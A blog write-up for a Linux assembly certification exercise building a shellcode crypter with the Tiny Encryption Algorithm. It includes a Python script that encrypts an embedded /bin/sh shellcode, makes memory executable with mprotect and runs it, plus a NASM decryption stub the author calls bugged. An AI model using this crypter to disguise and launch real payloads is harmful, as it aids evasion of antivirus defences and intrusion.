SLAE - Assignment #7: Custom Shellcode Crypter

SLAE – Assignment #7: Custom Shellcode Crypter

Posted by: voidsec Post Date: April 2, 2020

Reading Time: 10 minutes

Table of Contents

Assignment #7: Custom Shellcode Crypter

Seventh and last SLAE’s assignment requires to create a custom shellcode crypter.

Since I had to implement an entire encryption schema both in python as an helper and in assembly as the main decryption routine, I’ve opted for something simple. I’ve chosen the Tiny Encryption Algorithm (TEA) as it does not require large IV or SBOX initialization vectors (adding a huge overhead to my shellcode’s decoding routine), because it’s tiny and not too complex to re-implement.

As always, all the code is also available on GitHub.

Stay updated, join VoidSec’s Telegram Channel: https://t.me/voidsec_updates

TEA Implementation:

I’ve started writing my helper python script that can be seen below. It’s not heavily commented but should give you an insight on how my TEA implementation works.

Anyway, there is also this super useful image that act as a recap of the algorithm.

# Paolo Stagno aka [VoidSec](https://voidsec.com)
# SLAE-1511
#Pyhton Implementation of the Tiny Encryption Algorithm (TEA)
#https://en.wikipedia.org/wiki/Tiny_Encryption_Algorithm
#Tested on both Python 3.6.9 (ubuntu) and 3.8.2 (win 10)

import ctypes
import string
import random
import itertools
import math


def crypt(plaintext, key):
    """
    Encrypts a message using a 16-character key.

    :param plaintext:
        Plaintext message to encrypt.

    :param key:
        The encryption key used to encrypt the plaintext message.

    :return:
        Encrypted message.
    """
    v = _str2vec(plaintext)
    k = _str2vec(key)
    
    bytearray = b"".join(_vec2str(_crypt(chunk, k))for chunk in _chunks(v, 2))

    return bytearray


def _str2vec(string, l=4):
    """
    The string is split into chunks of length l and each chunk is encoded as 2 elements in the return value.
    
    :param string:
        A binary string to encode.
    :param l:
        An optional length value of chunks.
    :return:
        A vector containing ceil(n / l) elements where n is string's length.
    """
    n = len(string)#24
    # Split the string into chunks
    num_chunks = math.ceil(n / l) #6
    chunks = [string[l * i:l * (i + 1)] for i in range(num_chunks)] # chunk=key[4*0:4*(0+1)] "grep" chars four by four 0-11
    #print("CHUNKS:")
    #print(chunks) #will result in 6 chunks
    return [sum([chars << 8 * j for j, chars in enumerate(chunk)]) for chunk in chunks]#byte shift to trasform in c_uint32


def _vec2str(vector, l=4):
    """
    The string is composed by chunks of size l for every two elements in the vector.
    
    :param vector:
        An even-length vector.
    :param l:
        The length of the chunks to compose the returned string. This should match the value for l used by _str2vec.
        If the value used is smaller, characters will be lost.
    :return:
    """
    return bytes((element >> 8 * i) & 0xff for element in vector for i in range(l))


def _crypt(v, k):
    """
    TEA crypt algorithm. Crypt a length-2 vector using a length-4 vector key.

    :param v:
        A vector representing the information to be crypted. *Must* have a length of 2.
    :param k:
        A vector representing the encryption key. *Must* have a length of 4.
    :return:
        A length-2 vector representing the encrypted information v.
    """
    y, z = [ctypes.c_uint32(x) for x in v]
    sum = ctypes.c_uint32(0)
    delta = 0x9E3779B9

    for n in range(32, 0, -1):
        sum.value += delta
        y.value += (z.value << 4) + k[0] ^ z.value + sum.value ^ (z.value >> 5) + k[1]
        z.value += (y.value << 4) + k[2] ^ y.value + sum.value ^ (y.value >> 5) + k[3]

    return [y.value, z.value]


def _chunks(iterable, n):
    """
    Iterates through an iterable chunks of size n.

    :param iterable:
        Any iterable. Must have a length which is a multiple of n, or the last element will not contain n elements.
    :param n:
        The size of the chunks.
    :return:
        A generator that yields elements in chunks of size n.
    """
    it = iter(iterable)
    while True:
        chunk = tuple(itertools.islice(it, n))
        if not chunk:
            return
        yield chunk

        
def decrypt(ciphertext, key):
    """
    Decrypts a message using a 16-character key.

    :param ciphertext:
        The encrypted message.

    :param key:
        The encryption key used to encrypt the plaintext message.

    :return:
        Decrypted message.
    """
    if not ciphertext:
        return ""

    k = _str2vec(key)
    v = _str2vec(ciphertext)
    
    return b"".join(_vec2str(_decrypt(chunk, k)) for chunk in _chunks(v, 2))


def _decrypt(v, k):
    """
    TEA decrypt algorithm. Decrypt a length-2 vector using a length-4 vector key.

    :param v:
        A vector representing the information to be decrypted. *Must* have a length of 2.
    :param k:
        A vector representing the encryption key. *Must* have a length of 4.
    :return:
        The original message.
    """
    y, z = [ctypes.c_uint32(x) for x in v]
    sum = ctypes.c_uint32(0xC6EF3720)
    delta = 0x9E3779B9

    for n in range(32, 0, -1):
        z.value -= (y.value << 4) + k[2] ^ y.value + sum.value ^ (y.value >> 5) + k[3]
        y.value -= (z.value << 4) + k[0] ^ z.value + sum.value ^ (z.value >> 5) + k[1]
        sum.value -= delta

    return [y.value, z.value]


def key_generator(size=16, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
    """
    Generate a 16-character pseudo random key used to encrypt the plaintext message. Charset is a-z, A-Z, 0-9 

    :param size:
        Optional key size. Default for TEA encryption is 16.

    :return:
        A n-size pseudo random key.
    """
    key=str("".join(random.choice(chars) for _ in range(size))).encode()
    key=bytearray(key)
    return key


def nasm_gen(string):
    """
    Generate a nasm formatted shellcode.

    :param size:
        Hex encoded string.

    :return:
        Nasm formatted string.
    """
    string="0x"+"0x".join(a+b for a,b in zip(string[::2], string[1::2]))
    string=", ".join(string[i:i+4] for i in range(0, len(string), 4))
    return string


if __name__ == "__main__":
    key=key_generator()
    print("key: {}".format(key))
    hex_key=key.hex()
    print("hex key: {}".format(hex_key))
    print("NASM ready key: {}".format(nasm_gen(hex_key)))
    print("-------------------------------")
    shellcode=bytearray(b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xb0\x0b\xcd\x80")
    print("shellcode: {}".format(shellcode))
    shellcode_len=len(shellcode)
    print("original shellcode length: {}".format(shellcode_len))
    if (shellcode_len%2)!=0:
        #must be padded at an even number
        print("[!] shellcode length is not even, it will be padded to an even number")
        shellcode.append(0x90)
    multiple=(len(shellcode)%4)    
    if (multiple!=0):
        #must be padded to a multiple of 4
        print("[!] shellcode length is not multiple of 4, it will be further padded")
        if(multiple==1):
            shellcode.append(0x90)
            shellcode.append(0x90)
            shellcode.append(0x90)
        elif(multiple==2):
            shellcode.append(0x90)
            shellcode.append(0x90)
        elif(multiple==3):
            shellcode.append(0x90)
    if((len(shellcode)/4)%2!=0):
        #if is an odd number we must "block" pad it, otherwise will break on TEA encrypt as every chunk is taken 2 by 2
        print("[!] shellcode length must be 'block' padded in order to work with TEA")
        shellcode.append(0x90)
        shellcode.append(0x90)
        shellcode.append(0x90)
        shellcode.append(0x90)
    hex_shellcode=shellcode.hex()
    print("hex shellcode: {}".format(hex_shellcode))
    shellcode_len=int(len(hex_shellcode)/2)
    print("new shellcode length: {}".format(shellcode_len))
    print("-------------------------------")
    print("Encrypted shellcode:")
    enc = crypt(shellcode, key)
    print(enc)
    hex_enc=enc.hex()
    print("crypted shellcode in hex: {}".format(hex_enc))
    print("NASM ready shellcode: {}".format(nasm_gen(hex_enc)))
    print("-------------------------------")
    print("Decrypted shellcode:")
    dec=decrypt(enc, key)
    print(dec)
    print("decrypted shellcode in hex: {}".format(dec.hex()))
    print("Executing the shellcode...")
    shellcode=ctypes.create_string_buffer(dec)
    function = ctypes.cast(shellcode, ctypes.CFUNCTYPE(None))
    addr = ctypes.cast(function, ctypes.c_void_p).value
    libc = ctypes.CDLL('libc.so.6')
    pagesize = libc.getpagesize()
    addr_page = (addr // pagesize) * pagesize
    for page_start in range(addr_page, addr+len(dec), pagesize):
        #The NX Bit will prevents our data being executed, to get around it, we will call mprotect
        assert libc.mprotect(page_start, pagesize, 0x7) == 0
    function()

And here my (at the moment bugged – I will fix during the next couple days) ASM implementation:

; Paolo Stagno aka [VoidSec](https://voidsec.com)
; SLAE-1511
; NASM Implementation of the Tiny Encryption Algorithm (TEA)
; https://en.wikipedia.org/wiki/Tiny_Encryption_Algorithm

global _start
; EAX = SUM
; ECX = COUNTER
; EBX = v0 chunk
; EDX = FREE, used to store temporary values
; ESI = *encrypted_shellcode
; EDI = *key
section .text
_start:
  xor ecx,ecx							; clear ECX
  mul ecx								; trick to clear EAX
  xor ebx, ebx						; clear EBX
  xor edx, edx						; clear EDX
  xor esi, esi						; clear ESI
  xor edi, edi						; clear EDI
  jmp short key_section				; goto key_section

key_section:
  ; key0: 0x6c645a37
  ; key1: 0x6e775667
  ; key2: 0x57433641
  ; key3: 0x4e6c7151
  call key_loader					; goto key_loader, putting key on the stack
  ;       |          0          |            1           |           2          |            3           |
  ;       |         EDI         |          EDI+4         |         EDI+8        |          EDI+12        |
  key: db 0x6c, 0x64, 0x5a, 0x37, 0x6e, 0x77, 0x56, 0x67, 0x57, 0x43, 0x36, 0x41, 0x4e, 0x6c, 0x71, 0x51

key_loader:
  pop edi								; load address of our key into EDI (JMP CALL POP trick)
  jmp short shellcode_section			; goto shellcode_section

decoder:								; decoder
  pop esi								; load address of our encrypted_shellcode into ESI (JMP CALL POP trick)
  mov cl, 6							; load the number of our shellcode chunks, used to loop. (shellcode length is 24. 24/4(DWORD)=6)

decrypt_loop:
  push ecx							; save counter status before entering 32 iteration loop
    mov ecx, 32							; store loop counter, we nedd to cycle x32 times
  mov edx, 0xC6EF3720					; EDX = sum
  loop_32:
    mov ebx, dword [esi]				; v0 load encrypted_shellcode's chunk DWORD pointed by ESI in EBX | EBX=A
    ; v1 = v1-((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3)
    mov eax, ebx					; v0 is now in EAX
    shl eax, 4						; v0<<4
    add eax, dword [edi+8]			; +k2
    push eax						; store EAX (result) on stack
    mov eax, ebx					; v0 is now in EAX
    add eax, edx					; v0 + sum
    push eax						; store EAX (result) on stack
    mov eax, ebx					; v0 is now in EAX
    shr eax, 5						; v0>>5
    add eax, dword [edi+12]			; +k3
    ; EAX = ((v0>>5) + k3)
    pop ebx							; restore EBX = (v0 + sum)
    xor eax, ebx					; EAX = (v0 + sum) ^ ((v0>>5) + k3)
    pop ebx							; restore EBX = (v0<<4) + k2)
    xor eax, ebx					; EAX = ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3)
    sub eax, dword [esi+4]			; v1=v1-((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3)
    push eax						; store decrypted v1 on stack
    ;--------------------------------------------------------------------------------------
    mov ebx, dword [esi+4]			; v1 load encrypted_shellcode's chunk DWORD pointed by ESI in EBX | EBX=B
    ; v0 = v0-((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1)
    mov eax, ebx					; v1 is now in EAX
    shl eax, 4						; v1<<4
    add eax, dword [edi]			; +k0
    push eax						; store EAX (result) on stack
    mov eax, ebx					; v1 is now in EAX
    add eax, edx					; v1 + sum
    push eax						; store EAX (result) on stack
    mov eax, ebx					; v1 is now in EAX
    shr eax, 5						; v1>>5
    add eax, dword [edi+4]			; +k1
    ; EAX = ((v1>>5) + k1)
    pop ebx							; restore EBX = (v1 + sum)
    xor eax, ebx					; EAX = (v1 + sum) ^ ((v1>>5) + k1)
    pop ebx							; restore EBX = (v1<<4) + k0)
    xor eax, ebx					; EAX = ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1)
    sub eax, dword [esi]			; v0 = v0-((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1)
    push eax						; store decrypted v0 on stack
    ; sum = sum-delta
    sub	edx, 0x9E3779B9				; sum = sum-delta
    loop loop_32					; CL is 0? No, we go back at loop_32 and execute the cicle again
  ; save decrypted v0, v1
  save:
  pop eax								; EAX=v1
  mov dword [esi+4], eax				; store decrypted v1 back to encrypted_shellcode "buffer"
  pop eax								; EAX=v0
  mov dword [esi], eax				; store decrypted v0 back to encrypted_shellcode "buffer"
  ; ------
  mov ecx, 62							; for every loop_32 cicle I've saved v0,v1 on the stack (32*2)-2(already popped)
  stack_clean:
    pop eax							; clean the stack of precedent v0,v1 values popping saved values in eax
    loop stack_clean
  ; ------
  pop ecx								; restore ECX counter status
  add esi, 8							; select next chunk "couple"				
    loop decrypt_loop					; CL is 0? No, we go back at decrypt_loop and execute the cicle again
    jmp short encrypted_shellcode		; CL is 0! We've decrypted our shellcode and we can now directly jump into it

shellcode_section:
        call decoder					; goto decoder, putting encrypted_shellcode on the stack
    ;                       |          A          |           B           |           C           |           D            |          E           |            F          |
    ;						|         ESI         |         ESI+4         |         ESI+8         |         ESI+12         |        ESI+16        |          ESI+20       |
        encrypted_shellcode: db 0x56, 0x0e, 0xfe, 0x51, 0xba, 0x47, 0x31, 0xe3, 0xf6, 0xa5, 0x7b, 0xa8, 0x1a, 0xf8, 0x15, 0x71, 0xa4, 0xf9, 0x5b, 0x91, 0xef, 0x41, 0xdc, 0x3c
    ;						|<-chunk read direction|

SLAE Exam Statement

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE-1511

Share this post